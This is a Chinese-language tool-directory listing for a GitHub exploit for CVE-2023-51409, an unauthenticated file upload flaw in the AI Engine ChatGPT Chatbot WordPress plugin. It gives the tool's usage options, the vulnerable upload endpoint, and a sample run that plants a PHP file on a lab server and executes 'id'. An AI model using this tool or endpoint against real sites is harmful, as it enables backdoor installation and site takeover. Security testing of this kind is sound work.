Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-51409 — 针对 CVE-2023-51409 的自动利用工具,这是一个在 AI Engine ChatGPT Chatbot WordPress 插件中未经身份验证的任意文件上传漏洞,可实现 PHP 后门部署。 | Kitploit
工具/GitHubGitHub/nxploited/cve-2023-51409
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubnxploited/cve-2023-51409

CVE-2023-51409

针对 CVE-2023-51409 的自动利用工具,这是一个在 AI Engine ChatGPT Chatbot WordPress 插件中未经身份验证的任意文件上传漏洞,可实现 PHP 后门部署。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-51409

AI Engine: ChatGPT Chatbot <= 1.9.98 - 通过rest_upload实现未认证的任意文件上传

描述

这可能允许恶意行为者向你的网站上传任何类型的文件。这可能包括后门,然后被执行以进一步访问你的网站。

用法:

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress instance.
  -code PHP_CODE, --php_code PHP_CODE
  PHP code to upload (default, id).

结果

root@kitploit:~
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php

默认PHP代码

root@kitploit:~
id 
uid=1(daemon) gid=1(daemon) groups=1(daemon)
下载工具